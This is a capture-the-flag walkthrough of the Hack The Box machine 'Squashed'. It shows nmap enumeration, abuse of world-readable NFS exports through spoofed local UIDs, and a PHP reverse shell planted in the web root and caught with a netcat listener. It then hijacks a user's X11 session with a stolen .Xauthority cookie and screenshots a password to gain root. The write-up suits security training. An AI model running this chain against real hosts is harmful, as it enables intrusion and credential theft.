Squashed is an easy-level Linux box from hackthebox https://app.hackthebox.com/machines/Squashed
To start with the box let's start with basic Nmap enumeration for information gathering and enumeration
nmap -sC -sV -O -A 10.10.11.191 > nmap.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 09:25 EDT
Nmap scan report for 10.10.11.191
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Built Better
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42347/tcp6 mountd
| 100005 1,2,3 42811/tcp mountd
| 100005 1,2,3 55025/udp6 mountd
| 100005 1,2,3 59447/udp mountd
| 100021 1,3,4 33343/tcp nlockmgr
| 100021 1,3,4 44652/udp nlockmgr
| 100021 1,3,4 46627/tcp6 nlockmgr
| 100021 1,3,4 48415/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=6/22%OT=22%CT=1%CU=35562%PV=Y%DS=2%DC=T%G=Y%TM=64944BD
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST1
OS:1NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 234.48 ms 10.10.14.1
2 234.58 ms 10.10.11.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.88 seconds
The above nmap command shows us many services open, one of those that caught my eye was nfs at port 2049, to further enumerate this service I took help from
https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
Just visit hacktricks.xyz and search for nfs
Using showmount to view the available mount/folder from the server
──(kali㉿kali)-[~/htb/squashed]
└─$ showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *
┌──(kali㉿kali)-[~/htb/squashed]
└─$ mount -t nfs 10.10.11.191:/home/ross /tmp/mnt1 -o nolock
mount.nfs: failed to apply fstab options
Note that the mount command fails here, try using sudo
Also, make sure to create 2 temporary folders, which will be used to mount those folders from the server
mkdir /tmp/mnt1
mkdir /tmp/mnt2
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo mount -t nfs 10.10.11.191:/home/ross /tmp/mnt1 -o nolock
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo mount -t nfs 10.10.11.191:/var/www/html /tmp/mnt2 -o nolock
let us try to view the permissions of the folders that we mounted
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls -la /tmp/mnt1
total 68
drwxr-xr-x 14 1001 1001 4096 Jun 22 13:44 .
drwxrwxrwt 15 root root 4096 Jun 22 13:45 ..
lrwxrwxrwx 1 root root 9 Oct 20 2022 .bash_history -> /dev/null
drwx------ 11 1001 1001 4096 Oct 21 2022 .cache
drwx------ 12 1001 1001 4096 Oct 21 2022 .config
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Desktop
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Documents
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Downloads
drwx------ 3 1001 1001 4096 Oct 21 2022 .gnupg
drwx------ 3 1001 1001 4096 Oct 21 2022 .local
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Music
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Pictures
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Public
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Templates
drwxr-xr-x 2 1001 1001 4096 Oct 21 2022 Videos
lrwxrwxrwx 1 root root 9 Oct 21 2022 .viminfo -> /dev/null
-rw------- 1 1001 1001 57 Jun 22 13:44 .Xauthority
-rw------- 1 1001 1001 2475 Jun 22 13:44 .xsession-errors
-rw------- 1 1001 1001 2475 Dec 27 10:33 .xsession-errors.old
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls -la /tmp/mnt2
ls: cannot access '/tmp/mnt2/.': Permission denied
ls: cannot access '/tmp/mnt2/..': Permission denied
ls: cannot access '/tmp/mnt2/.htaccess': Permission denied
ls: cannot access '/tmp/mnt2/index.html': Permission denied
ls: cannot access '/tmp/mnt2/images': Permission denied
ls: cannot access '/tmp/mnt2/css': Permission denied
ls: cannot access '/tmp/mnt2/js': Permission denied
total 0
d????????? ? ? ? ? ? .
d????????? ? ? ? ? ? ..
?????????? ? ? ? ? ? css
?????????? ? ? ? ? ? .htaccess
?????????? ? ? ? ? ? images
?????????? ? ? ? ? ? index.html
?????????? ? ? ? ? ? js
we can see that the mnt2 folder has most of the files which are owned by and have a group Id of 1001, so we can try to access this by creating a user with those UID and GID (user ID and Group ID) to access those file contents by becoming the owner of those
let us also try to view the owner of the entire folder
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls -ld /tmp/mnt2
drwxr-xr-- 5 2017 www-data 4096 Jun 22 09:35 /tmp/mnt2
In the above file listing, "2017" refers to the user ID (UID) of the owner of the directory "/tmp/mnt2". In Unix-like systems, file permissions are associated with three entities: the owner, the group, and others.
drwxr-xr-- 5 2017 Jun 22 09:35 /tmp/mnt2
In this case, the UID "2017" represents the user who owns the directory "/tmp/mnt2". The UID is a unique numerical identifier assigned to each user on a Unix-like system.
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo useradd a
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo usermod -u 2017 a
-u flag is used to change the UID of a user
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls -ld /tmp/mnt1
drwxr-xr-x 14 1001 a 4096 Jun 22 13:44 /tmp/mnt1
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls -ld /tmp/mnt2
drwxr-xr-- 5 a www-data 4096 Jun 22 13:55 /tmp/mnt2
Now you can see that instead of 1001 the UID is changed to the user a, now let us try to access the contents of the file (first using kali user and then using a user to check for permissions)
┌──(kali㉿kali)-[~/htb/squashed]
└─$ cd /tmp/mnt2
cd: permission denied: /tmp/mnt2
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls -ld /tmp/mnt2
drwxr-xr-- 5 a www-data 4096 Jun 22 13:55 /tmp/mnt2
Now try to access the folder by switching to the user a, you might want to set a password for the user created to use that user, use the command
sudo passwd a
to change/create a password
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo passwd a
New password:
Retype new password:
passwd: password updated successfully
┌──(kali㉿kali)-[~/htb/squashed]
└─$ su a
Password:
$ cd /tmp/mnt2
$ ls
css images index.html js
$
Now we can access the folder and its contents, the /var/www/html looked like the file contents of a web server, the easiest way that I can think of to get a reverse shell would be to write a script here, set up a listener on another tab in my local pc and execute the script using my browser by loading 10.10.11.191/script.php
let us grab the most popular pentestmonkey php reverse shell
Use ifconfig to get your IP Address, now go to https://www.revshells.com/ and give IP as tun0's IP in my case it is 10.10.14.4 select PHP Pentestmonkey and copy the code
Now paste this as a PHP script in the /var/www/html mounted folder. I have saved the script as rev.php
Set up the listener in another terminal using the command nc -lvnp 9001 (this is netcat listener) and in the browser hit the script by visiting http://10.10.11.191/rev.php in your browser and you will get a reverse shell to the server as seen below in the image
But as you will see in the below image this shell is not interactive
┌──(kali㉿kali)-[~/htb]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.191] 59426
Linux squashed.htb 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
18:24:04 up 6 min, 1 user, load average: 0.01, 0.20, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 18:18 6:02 1.58s 0.05s /usr/libexec/gnome-session-binary --systemd --session=gnome
uid=2017(alex) gid=2017(alex) groups=2017(alex)
sh: 0: can't access tty; job control turned off
$ ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
To make this shell interactive you can use the following guide or follow along with what I did
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm
get the user flag from Alex's folder as seen above
Now to think about root access, we first saw that there was a .Xauthority file in the /tmp/mnt1 mounted folder, which now after getting remote access to the machine we can see is owned by ross, and we still don't know password for ross, so we can use the similar thing that we did to get a reverse shell that is we can look up for the UID owner for temporarily mounted folder and then we can view this file, the reason behind trying to read this file was:
after researching a bit, this file is used as a cookie for authentication purposes by service x, which is also called X11, I had no idea about this but just search for it .Xauthority on Google and hacktricksxyz gave a better idea about this
https://askubuntu.com/questions/300682/what-is-the-xauthority-file
The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. The goal for exploiting this service would be to get/sniff screenshots, keyboard keystrokes or live to view, I tried to view the structure of the folders and observed a .kdbx file in documents, and searched a bit for .kdbx files I realized that A KDBX file is a password database created by KeePass Password Safe, a free password manager, so if we imitate Ross who is the owner of this and get a screenshot of this display using x11 we may get a hold of some passwords
alex@squashed:/home/ross$ ls -la
total 68
drwxr-xr-x 14 ross ross 4096 Jun 22 18:49 .
drwxr-xr-x 4 root root 4096 Oct 21 2022 ..
-rw------- 1 ross ross 57 Jun 22 18:49 .Xauthority
lrwxrwxrwx 1 root root 9 Oct 20 2022 .bash_history -> /dev/null
drwx------ 11 ross ross 4096 Oct 21 2022 .cache
drwx------ 12 ross ross 4096 Oct 21 2022 .config
drwx------ 3 ross ross 4096 Oct 21 2022 .gnupg
drwx------ 3 ross ross 4096 Oct 21 2022 .local
lrwxrwxrwx 1 root root 9 Oct 21 2022 .viminfo -> /dev/null
-rw------- 1 ross ross 2475 Jun 22 18:49 .xsession-errors
-rw------- 1 ross ross 2475 Dec 27 15:33 .xsession-errors.old
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Desktop
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Documents
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Downloads
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Music
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Pictures
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Public
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Templates
drwxr-xr-x 2 ross ross 4096 Oct 21 2022 Videos
So the next steps will be, to create a user with UID and GID of 1001 and switch to that user so that the user will be the owner of the /tmp/mnt1 share, copy the contents of the .Xauthority file and use this in the reverse shell that we got earlier and using this cookie file we can capture a screenshot, you can also delete a previous user created if it gives you some error such as a user with UID 1001 already created by the following command
sudo userdel a
Now creating a new user b
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo adduser b
Adding user `b' ...
Adding new group `b' (1002) ...
Adding new user `b' (1002) with group `b (1002)' ...
Creating home directory `/home/b' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for b
Enter the new value, or press ENTER for the default
Full Name []: b
Room Number []: b
Work Phone []: b
Home Phone []: b
Other []: b
Is the information correct? [Y/n] y
Adding new user `b' to supplemental / extra groups `users' ...
Adding user `b' to group `users' ...
┌──(kali㉿kali)-[~/htb/squashed]
└─$ sudo usermod -u 1001 b
sudo groupmod -g 1001 b
sudo su b
Now after switching to user b try to view .Xauthority file from /tmp/mnt1 share
$ cd /tmp
$ ls
mnt1 systemd-private-12c966e60f7e4cc2982efe160c229832-haveged.service-HYz6sA
mnt2 systemd-private-12c966e60f7e4cc2982efe160c229832-ModemManager.service-ftZR3A
mozilla-temp-1293341910 systemd-private-12c966e60f7e4cc2982efe160c229832-systemd-logind.service-GOcxjK
ssh-XXXXXXwVtzst systemd-private-12c966e60f7e4cc2982efe160c229832-upower.service-tSiOX3
systemd-private-12c966e60f7e4cc2982efe160c229832-colord.service-S2lHik Temp-49a76648-df95-47e9-aef5-8d68d877f88a
$ cd /mnt1
$ cat .Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1��]���G����
You can see from the format of the file we can't view this properly and what we want to do is save this file somewhere on our reverse access shell that we got on the server and set an environment variable for this file so that whenever we want to use this as a cookie we won't need to mention it every time, so to ensure that we copy the contents properly let us convert this to a base64 format then copy this from mount share to the remote box and save there as a base64 decoded value
$ cat .Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABClG4MXnV2uD5mVEEe065rR
Good now we can copy this string from here to the remote access that is terminal alex@squashed
alex@squashed: echo "AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABClG4MXnV2uD5mVEEe065rR" | base64 -d > /tmp/.Xauthority
alex@squashed: export XAUTHORITY=/tmp/.Xauthority
alex@squashed: echo $XAUTHORITY
/tmp/.Xauthority
We did this on the remote box, the owner of .Xauthority file was ross which we did not have access to, now if we use the x11 service this will use our above .Xauthority file in the temporary folder, we can now interact with the display as we have hijacked Ross's session
Now, following https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11#screenshots-capturing
to capture screenshot
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
to get which display Ross is using we can use w command
alex@squashed:/$ w
w
19:05:42 up 17 min, 1 user, load average: 0.00, 0.01, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 18:49 16:58 3.78s 0.04s /usr/libexec/gnome-session-binary --systemd --session=gnome
alex@squashed:/$
Looking above FROM column shows :0 display is used
alex@squashed:/$ xwd -root -screen -silent -display :0 > /tmp/screen.xwd
alex@squashed:/$ ls /tmp
screen.xwd
alex@squashed:/$ cd /tmp
cd /tmp
Now we want to get this .xwd file locally on our system so it would be easier to convert it to .png file and see the screenshot, easiest way would be to set up a Python server in this directory and get the file locally using wget
alex@squashed:/tmp$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.4 - - [22/Jun/2023 19:11:09] "GET /screen.xwd HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/htb/squashed]
└─$ wget http://10.10.11.191:8000/screen.xwd
--2023-06-22 15:11:07-- http://10.10.11.191:8000/screen.xwd
Connecting to 10.10.11.191:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [image/x-xwindowdump]
Saving to: ‘screen.xwd’
screen.xwd [ <=> ] 0 --.-KB/s in 0s
2023-06-22 15:11:08 (0.00 B/s) - ‘screen.xwd’ saved [0/0]
┌──(kali㉿kali)-[~/htb/squashed]
└─$ ls
links.py nmap.txt screen.xwd
Now to convert this .xwd to .png I first tried using the convert command but it failed so just used an online converter for this
Now download this image and you will see the password in clear text
Now try to use this password to get root access
Success!! 😀🥳🥳
